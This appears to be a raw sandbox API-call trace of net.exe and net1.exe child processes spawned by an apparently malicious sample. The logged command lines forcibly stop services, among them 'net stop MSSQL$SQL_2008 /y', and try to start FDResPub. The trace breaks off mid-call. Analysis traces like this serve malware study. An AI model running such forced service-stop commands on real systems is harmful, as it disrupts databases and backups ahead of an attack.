[0088.011] _wcsicmp (_String1="group", _String2="bedbg") returned 5 [0088.011] _wcsicmp (_String1="groups", _String2="bedbg") returned 5 [0088.011] _wcsicmp (_String1="help", _String2="bedbg") returned 6 [0088.011] _wcsicmp (_String1="helpmsg", _String2="bedbg") returned 6 [0088.011] _wcsicmp (_String1="localgroup", _String2="bedbg") returned 10 [0088.011] _wcsicmp (_String1="pause", _String2="bedbg") returned 14 [0088.011] _wcsicmp (_String1="session", _String2="bedbg") returned 17 [0088.011] _wcsicmp (_String1="sessions", _String2="bedbg") returned 17 [0088.011] _wcsicmp (_String1="sess", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="share", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="start", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="stats", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="statistics", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="stop", _String2="bedbg") returned 17 [0088.012] _wcsicmp (_String1="time", _String2="bedbg") returned 18 [0088.012] _wcsicmp (_String1="user", _String2="bedbg") returned 19 [0088.012] _wcsicmp (_String1="users", _String2="bedbg") returned 19 [0088.012] _wcsicmp (_String1="msg", _String2="bedbg") returned 11 [0088.012] _wcsicmp (_String1="messenger", _String2="bedbg") returned 11 [0088.012] _wcsicmp (_String1="receiver", _String2="bedbg") returned 16 [0088.012] _wcsicmp (_String1="rcv", _String2="bedbg") returned 16 [0088.012] _wcsicmp (_String1="netpopup", _String2="bedbg") returned 12 [0088.012] _wcsicmp (_String1="redirector", _String2="bedbg") returned 16 [0088.012] _wcsicmp (_String1="redir", _String2="bedbg") returned 16 [0088.012] _wcsicmp (_String1="rdr", _String2="bedbg") returned 16 [0088.012] _wcsicmp (_String1="workstation", _String2="bedbg") returned 21 [0088.012] _wcsicmp (_String1="work", _String2="bedbg") returned 21 [0088.012] _wcsicmp (_String1="wksta", _String2="bedbg") returned 21 [0088.012] _wcsicmp (_String1="prdr", _String2="bedbg") returned 14 [0088.013] _wcsicmp (_String1="devrdr", _String2="bedbg") returned 2 [0088.013] _wcsicmp (_String1="lanmanworkstation", _String2="bedbg") returned 10 [0088.013] _wcsicmp (_String1="server", _String2="bedbg") returned 17 [0088.013] _wcsicmp (_String1="svr", _String2="bedbg") returned 17 [0088.013] _wcsicmp (_String1="srv", _String2="bedbg") returned 17 [0088.013] _wcsicmp (_String1="lanmanserver", _String2="bedbg") returned 10 [0088.013] _wcsicmp (_String1="alerter", _String2="bedbg") returned -1 [0088.013] _wcsicmp (_String1="netlogon", _String2="bedbg") returned 12 [0088.013] _wcsupr (in: _String="bedbg" | out: _String="BEDBG") returned="BEDBG" [0088.052] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x225488 [0088.073] GetServiceKeyNameW (in: hSCManager=0x225488, lpDisplayName="BEDBG", lpServiceName=0x3faaf0, lpcchBuffer=0x14fdb0 | out: lpServiceName="", lpcchBuffer=0x14fdb0) returned 0 [0088.142] _wcsicmp (_String1="msg", _String2="BEDBG") returned 11 [0088.142] _wcsicmp (_String1="messenger", _String2="BEDBG") returned 11 [0088.142] _wcsicmp (_String1="receiver", _String2="BEDBG") returned 16 [0088.142] _wcsicmp (_String1="rcv", _String2="BEDBG") returned 16 [0088.142] _wcsicmp (_String1="redirector", _String2="BEDBG") returned 16 [0088.142] _wcsicmp (_String1="redir", _String2="BEDBG") returned 16 [0088.142] _wcsicmp (_String1="rdr", _String2="BEDBG") returned 16 [0088.142] _wcsicmp (_String1="workstation", _String2="BEDBG") returned 21 [0088.142] _wcsicmp (_String1="work", _String2="BEDBG") returned 21 [0088.142] _wcsicmp (_String1="wksta", _String2="BEDBG") returned 21 [0088.142] _wcsicmp (_String1="prdr", _String2="BEDBG") returned 14 [0088.142] _wcsicmp (_String1="devrdr", _String2="BEDBG") returned 2 [0088.142] _wcsicmp (_String1="lanmanworkstation", _String2="BEDBG") returned 10 [0088.142] _wcsicmp (_String1="server", _String2="BEDBG") returned 17 [0088.142] _wcsicmp (_String1="svr", _String2="BEDBG") returned 17 [0088.142] _wcsicmp (_String1="srv", _String2="BEDBG") returned 17 [0088.142] _wcsicmp (_String1="lanmanserver", _String2="BEDBG") returned 10 [0088.142] _wcsicmp (_String1="alerter", _String2="BEDBG") returned -1 [0088.142] _wcsicmp (_String1="netlogon", _String2="BEDBG") returned 12 [0088.142] NetServiceControl (in: servername=0x0, service="BEDBG", opcode=0x0, arg=0x0, bufptr=0x14fdac | out: bufptr=0x14fdac) returned 0x889 [0088.143] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.143] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0088.818] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.819] GetFileType (hFile=0x0) returned 0x0 [0088.819] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x223ea8 [0088.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x223ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0088.819] WriteFile (in: hFile=0x0, lpBuffer=0x223ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14fcec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fcec, lpOverlapped=0x0) returned 0 [0088.819] LocalFree (hMem=0x223ea8) returned 0x0 [0088.819] GetFileType (hFile=0x0) returned 0x0 [0088.819] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226150 [0088.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0088.819] WriteFile (in: hFile=0x0, lpBuffer=0x226150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fcec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fcec, lpOverlapped=0x0) returned 0 [0088.819] LocalFree (hMem=0x226150) returned 0x0 [0088.819] _ultow (in: _Dest=0x889, _Radix=1375516 | out: _Dest=0x889) returned="2185" [0088.819] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0088.820] GetFileType (hFile=0x0) returned 0x0 [0088.820] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x226150 [0088.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x226150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0088.820] WriteFile (in: hFile=0x0, lpBuffer=0x226150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fcf8, lpOverlapped=0x0) returned 0 [0088.820] LocalFree (hMem=0x226150) returned 0x0 [0088.820] GetFileType (hFile=0x0) returned 0x0 [0088.820] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226150 [0088.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0088.820] WriteFile (in: hFile=0x0, lpBuffer=0x226150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fcf8, lpOverlapped=0x0) returned 0 [0088.820] LocalFree (hMem=0x226150) returned 0x0 [0088.820] NetApiBufferFree (Buffer=0x221ad0) returned 0x0 [0088.820] NetApiBufferFree (Buffer=0x221ae8) returned 0x0 [0088.820] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0088.821] exit (_Code=2) Process: id = "33" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x77952000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0xb7c Process: id = "34" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x795b1000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xa84" cmd_line = "C:\\Windows\\system32\\net1 start FDResPub /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0x270 [0088.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f7dc | out: lpSystemTimeAsFileTime=0x12f7dc*(dwLowDateTime=0xde4dcf0, dwHighDateTime=0x1d6f0d1)) [0088.297] GetCurrentProcessId () returned 0x974 [0088.297] GetCurrentThreadId () returned 0x270 [0088.297] GetTickCount () returned 0x114bcca [0088.297] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7d4 | out: lpPerformanceCount=0x12f7d4*=20739764502) returned 1 [0088.297] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0088.297] __set_app_type (_Type=0x1) [0088.297] __p__fmode () returned 0x770331f4 [0088.297] __p__commode () returned 0x770331fc [0088.297] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0088.297] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0088.297] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.298] GetConsoleOutputCP () returned 0x1b5 [0088.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0088.298] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.301] sprintf_s (in: _DstBuf=0x12f794, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.301] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0088.302] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.302] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start FDResPub /y" [0088.302] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f560, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0088.302] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x66) returned 0x483ad8 [0088.303] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.303] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f764 | out: Buffer=0x12f764*=0x481ae0) returned 0x0 [0088.303] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f764 | out: Buffer=0x12f764*=0x481af8) returned 0x0 [0088.303] _fileno (_File=0x77032900) returned -2 [0088.303] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0088.303] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0088.303] _wcsicmp (_String1="computer", _String2="start") returned -16 [0088.303] _wcsicmp (_String1="config", _String2="start") returned -16 [0088.303] _wcsicmp (_String1="continue", _String2="start") returned -16 [0088.303] _wcsicmp (_String1="cont", _String2="start") returned -16 [0088.303] _wcsicmp (_String1="file", _String2="start") returned -13 [0088.303] _wcsicmp (_String1="files", _String2="start") returned -13 [0088.303] _wcsicmp (_String1="group", _String2="start") returned -12 [0088.303] _wcsicmp (_String1="groups", _String2="start") returned -12 [0088.303] _wcsicmp (_String1="help", _String2="start") returned -11 [0088.303] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0088.303] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0088.303] _wcsicmp (_String1="pause", _String2="start") returned -3 [0088.303] _wcsicmp (_String1="session", _String2="start") returned -15 [0088.304] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0088.304] _wcsicmp (_String1="sess", _String2="start") returned -15 [0088.304] _wcsicmp (_String1="share", _String2="start") returned -12 [0088.304] _wcsicmp (_String1="start", _String2="start") returned 0 [0088.304] _wcsicmp (_String1="accounts", _String2="FDResPub") returned -5 [0088.304] _wcsicmp (_String1="computer", _String2="FDResPub") returned -3 [0088.304] _wcsicmp (_String1="config", _String2="FDResPub") returned -3 [0088.304] _wcsicmp (_String1="continue", _String2="FDResPub") returned -3 [0088.304] _wcsicmp (_String1="cont", _String2="FDResPub") returned -3 [0088.304] _wcsicmp (_String1="file", _String2="FDResPub") returned 5 [0088.304] _wcsicmp (_String1="files", _String2="FDResPub") returned 5 [0088.304] _wcsicmp (_String1="group", _String2="FDResPub") returned 1 [0088.304] _wcsicmp (_String1="groups", _String2="FDResPub") returned 1 [0088.304] _wcsicmp (_String1="help", _String2="FDResPub") returned 2 [0088.304] _wcsicmp (_String1="helpmsg", _String2="FDResPub") returned 2 [0088.304] _wcsicmp (_String1="localgroup", _String2="FDResPub") returned 6 [0088.304] _wcsicmp (_String1="pause", _String2="FDResPub") returned 10 [0088.304] _wcsicmp (_String1="session", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="sessions", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="sess", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="share", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="start", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="stats", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="statistics", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="stop", _String2="FDResPub") returned 13 [0088.304] _wcsicmp (_String1="time", _String2="FDResPub") returned 14 [0088.304] _wcsicmp (_String1="user", _String2="FDResPub") returned 15 [0088.304] _wcsicmp (_String1="users", _String2="FDResPub") returned 15 [0088.304] _wcsicmp (_String1="msg", _String2="FDResPub") returned 7 [0088.304] _wcsicmp (_String1="messenger", _String2="FDResPub") returned 7 [0088.304] _wcsicmp (_String1="receiver", _String2="FDResPub") returned 12 [0088.304] _wcsicmp (_String1="rcv", _String2="FDResPub") returned 12 [0088.304] _wcsicmp (_String1="netpopup", _String2="FDResPub") returned 8 [0088.304] _wcsicmp (_String1="redirector", _String2="FDResPub") returned 12 [0088.304] _wcsicmp (_String1="redir", _String2="FDResPub") returned 12 [0088.304] _wcsicmp (_String1="rdr", _String2="FDResPub") returned 12 [0088.305] _wcsicmp (_String1="workstation", _String2="FDResPub") returned 17 [0088.305] _wcsicmp (_String1="work", _String2="FDResPub") returned 17 [0088.305] _wcsicmp (_String1="wksta", _String2="FDResPub") returned 17 [0088.305] _wcsicmp (_String1="prdr", _String2="FDResPub") returned 10 [0088.305] _wcsicmp (_String1="devrdr", _String2="FDResPub") returned -2 [0088.305] _wcsicmp (_String1="lanmanworkstation", _String2="FDResPub") returned 6 [0088.305] _wcsicmp (_String1="server", _String2="FDResPub") returned 13 [0088.305] _wcsicmp (_String1="svr", _String2="FDResPub") returned 13 [0088.305] _wcsicmp (_String1="srv", _String2="FDResPub") returned 13 [0088.305] _wcsicmp (_String1="lanmanserver", _String2="FDResPub") returned 6 [0088.305] _wcsicmp (_String1="alerter", _String2="FDResPub") returned -5 [0088.305] _wcsicmp (_String1="netlogon", _String2="FDResPub") returned 8 [0088.305] _wcsupr (in: _String="FDResPub" | out: _String="FDRESPUB") returned="FDRESPUB" [0088.305] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4854a8 [0088.307] GetServiceKeyNameW (in: hSCManager=0x4854a8, lpDisplayName="FDRESPUB", lpServiceName=0x3faaf0, lpcchBuffer=0x12f6fc | out: lpServiceName="", lpcchBuffer=0x12f6fc) returned 0 [0088.307] _wcsicmp (_String1="msg", _String2="FDRESPUB") returned 7 [0088.307] _wcsicmp (_String1="messenger", _String2="FDRESPUB") returned 7 [0088.307] _wcsicmp (_String1="receiver", _String2="FDRESPUB") returned 12 [0088.307] _wcsicmp (_String1="rcv", _String2="FDRESPUB") returned 12 [0088.307] _wcsicmp (_String1="redirector", _String2="FDRESPUB") returned 12 [0088.308] _wcsicmp (_String1="redir", _String2="FDRESPUB") returned 12 [0088.308] _wcsicmp (_String1="rdr", _String2="FDRESPUB") returned 12 [0088.308] _wcsicmp (_String1="workstation", _String2="FDRESPUB") returned 17 [0088.308] _wcsicmp (_String1="work", _String2="FDRESPUB") returned 17 [0088.308] _wcsicmp (_String1="wksta", _String2="FDRESPUB") returned 17 [0088.308] _wcsicmp (_String1="prdr", _String2="FDRESPUB") returned 10 [0088.308] _wcsicmp (_String1="devrdr", _String2="FDRESPUB") returned -2 [0088.308] _wcsicmp (_String1="lanmanworkstation", _String2="FDRESPUB") returned 6 [0088.308] _wcsicmp (_String1="server", _String2="FDRESPUB") returned 13 [0088.308] _wcsicmp (_String1="svr", _String2="FDRESPUB") returned 13 [0088.308] _wcsicmp (_String1="srv", _String2="FDRESPUB") returned 13 [0088.308] _wcsicmp (_String1="lanmanserver", _String2="FDRESPUB") returned 6 [0088.308] _wcsicmp (_String1="alerter", _String2="FDRESPUB") returned -5 [0088.308] _wcsicmp (_String1="netlogon", _String2="FDRESPUB") returned 8 [0088.308] NetServiceControl (in: servername=0x0, service="FDRESPUB", opcode=0x0, arg=0x0, bufptr=0x12f6f0 | out: bufptr=0x12f6f0) returned 0x0 [0088.309] NetServiceInstall (in: servername=0x0, service="FDRESPUB", argc=0x0, argv=0x0, bufptr=0x12f6e0 | out: bufptr=0x12f6e0) returned 0x0 [0088.926] free (_Block=0x0) [0088.926] GetServiceDisplayNameW (in: hSCManager=0x4854a8, lpServiceName="FDRESPUB", lpDisplayName=0x401fc0, lpcchBuffer=0x12f6b8 | out: lpDisplayName="Function Discovery Resource Publication", lpcchBuffer=0x12f6b8) returned 1 [0088.926] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.926] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0088.927] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc2, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The Function Discovery Resource Publication service is starting") returned 0x3f [0088.928] GetFileType (hFile=0x37c) returned 0x3 [0088.928] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x486150 [0088.928] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Function Discovery Resource Publication service is starting", cchWideChar=63, lpMultiByteStr=0x486150, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Function Discovery Resource Publication service is starting", lpUsedDefaultChar=0x0) returned 63 [0088.928] WriteFile (in: hFile=0x37c, lpBuffer=0x486150*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x12f664, lpOverlapped=0x0 | out: lpBuffer=0x486150*, lpNumberOfBytesWritten=0x12f664*=0x3f, lpOverlapped=0x0) returned 1 [0088.928] LocalFree (hMem=0x486150) returned 0x0 [0088.928] NetapipBufferAllocate () returned 0x0 [0088.929] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x12f6c0 | out: _Buffer=".") returned 1 [0088.929] GetFileType (hFile=0x37c) returned 0x3 [0088.929] LocalAlloc (uFlags=0x0, uBytes=0x2) returned 0x486150 [0088.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x486150, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".\x8eH", lpUsedDefaultChar=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x37c, lpBuffer=0x486150*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x12f694, lpOverlapped=0x0 | out: lpBuffer=0x486150*, lpNumberOfBytesWritten=0x12f694*=0x1, lpOverlapped=0x0) returned 1 [0088.929] LocalFree (hMem=0x486150) returned 0x0 [0088.929] Sleep (dwMilliseconds=0x7d0) [0093.308] NetApiBufferFree (Buffer=0x487e38) returned 0x0 [0093.308] NetServiceControl (in: servername=0x0, service="FDRESPUB", opcode=0x0, arg=0x0, bufptr=0x12f6f0 | out: bufptr=0x12f6f0) returned 0x0 [0093.310] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x12f6c0 | out: _Buffer=".") returned 1 [0093.310] GetFileType (hFile=0x37c) returned 0x3 [0093.311] LocalAlloc (uFlags=0x0, uBytes=0x2) returned 0x486150 [0093.311] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x486150, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".\x80H", lpUsedDefaultChar=0x0) returned 1 [0093.311] WriteFile (in: hFile=0x37c, lpBuffer=0x486150, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x12f694, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f694, lpOverlapped=0x0) returned 0 [0093.311] LocalFree (hMem=0x486150) returned 0x0 [0093.311] Sleep (dwMilliseconds=0x9c4) [0098.103] NetApiBufferFree (Buffer=0x487e38) returned 0x0 [0098.103] NetServiceControl (in: servername=0x0, service="FDRESPUB", opcode=0x0, arg=0x0, bufptr=0x12f6f0 | out: bufptr=0x12f6f0) returned 0x0 [0098.104] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x12f6c0 | out: _Buffer="\r\n") returned 2 [0098.104] GetFileType (hFile=0x37c) returned 0x3 [0098.104] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0098.104] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0098.104] WriteFile (in: hFile=0x37c, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f694, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f694, lpOverlapped=0x0) returned 0 [0098.104] LocalFree (hMem=0x486150) returned 0x0 [0098.104] NetServiceControl (in: servername=0x0, service="FDRESPUB", opcode=0x3, arg=0x0, bufptr=0x12f6f0 | out: bufptr=0x12f6f0) returned 0x888 [0098.105] GetServiceDisplayNameW (in: hSCManager=0x4854a8, lpServiceName="FDRESPUB", lpDisplayName=0x401fc0, lpcchBuffer=0x12f6b8 | out: lpDisplayName="Function Discovery Resource Publication", lpcchBuffer=0x12f6b8) returned 1 [0098.106] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc3, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The Function Discovery Resource Publication service could not be started.\r\n") returned 0x4b [0098.106] GetFileType (hFile=0x0) returned 0x0 [0098.106] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x486150 [0098.106] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Function Discovery Resource Publication service could not be started.\r\n", cchWideChar=75, lpMultiByteStr=0x486150, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Function Discovery Resource Publication service could not be started.\r\n", lpUsedDefaultChar=0x0) returned 75 [0098.106] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x12f638, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f638, lpOverlapped=0x0) returned 0 [0098.106] LocalFree (hMem=0x486150) returned 0x0 [0098.106] GetFileType (hFile=0x0) returned 0x0 [0098.106] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0098.106] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0098.106] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f638, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f638, lpOverlapped=0x0) returned 0 [0098.106] LocalFree (hMem=0x486150) returned 0x0 [0098.106] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0xbf0, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="A system error has occurred.\r\n") returned 0x1e [0098.106] GetFileType (hFile=0x0) returned 0x0 [0098.106] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x483ec0 [0098.106] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="A system error has occurred.\r\n", cchWideChar=30, lpMultiByteStr=0x483ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A system error has occurred.\r\n", lpUsedDefaultChar=0x0) returned 30 [0098.106] WriteFile (in: hFile=0x0, lpBuffer=0x483ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.106] LocalFree (hMem=0x483ec0) returned 0x0 [0098.106] GetFileType (hFile=0x0) returned 0x0 [0098.107] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0098.107] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0098.107] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.107] LocalFree (hMem=0x486150) returned 0x0 [0098.107] _ultow (in: _Dest=0x5, _Radix=1241716 | out: _Dest=0x5) returned="5" [0098.107] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdae, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="System error 5 has occurred.\r\n") returned 0x1e [0098.107] GetFileType (hFile=0x0) returned 0x0 [0098.107] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x483ec0 [0098.107] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, 